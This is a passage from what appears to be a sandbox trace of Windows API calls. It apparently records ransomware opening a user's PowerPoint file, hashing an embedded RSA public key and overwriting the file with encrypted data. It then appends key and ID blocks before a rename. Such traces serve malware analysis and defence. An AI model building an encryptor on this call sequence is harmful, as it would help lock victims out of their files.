HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\6CwJR4agNRfXCpY.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\6cwjr4agnrfxcpy.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.098] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=18776) returned 1 [0205.098] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.100] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x4932, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.100] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.102] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.102] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x4958, lpOverlapped=0x0) returned 1 [0205.102] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.103] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.103] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.103] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.103] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.103] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.104] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.104] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.104] GetLastError () returned 0x0 [0205.104] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.104] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.104] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.104] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.104] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4960) returned 0x3b77950 [0205.104] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b812c0 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe640 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81308 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe658 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe688 [0205.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6d0 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6a0 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.105] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe688 | out: hHeap=0x2c0000) returned 1 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6a0 | out: hHeap=0x2c0000) returned 1 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6d0 | out: hHeap=0x2c0000) returned 1 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6d0 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe6a0 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe688 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6a0 | out: hHeap=0x2c0000) returned 1 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe688 | out: hHeap=0x2c0000) returned 1 [0205.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6d0 | out: hHeap=0x2c0000) returned 1 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.106] GetCurrentThreadId () returned 0x600 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b686a8 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.106] GetCurrentThreadId () returned 0x600 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6d0 [0205.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe688 [0205.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6a0 [0205.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe670 [0205.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6e8 [0205.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6b8 [0205.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe700 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe688 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe688 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6d0 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe700 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe688 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7c2b8 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fa0 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c2b8 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6b8 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6a0 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe670 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe658 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81308 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72e98 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.110] WriteFile (in: hFile=0x63c, lpBuffer=0x3b77950*, nNumberOfBytesToWrite=0x4953, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b77950*, lpNumberOfBytesWritten=0x39cfb14*=0x4953, lpOverlapped=0x0) returned 1 [0205.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77950 | out: hHeap=0x2c0000) returned 1 [0205.110] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x4958, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.110] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.110] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.110] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.110] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.110] CloseHandle (hObject=0x63c) returned 1 [0205.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0205.112] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\6CwJR4agNRfXCpY.ppt" (normalized: 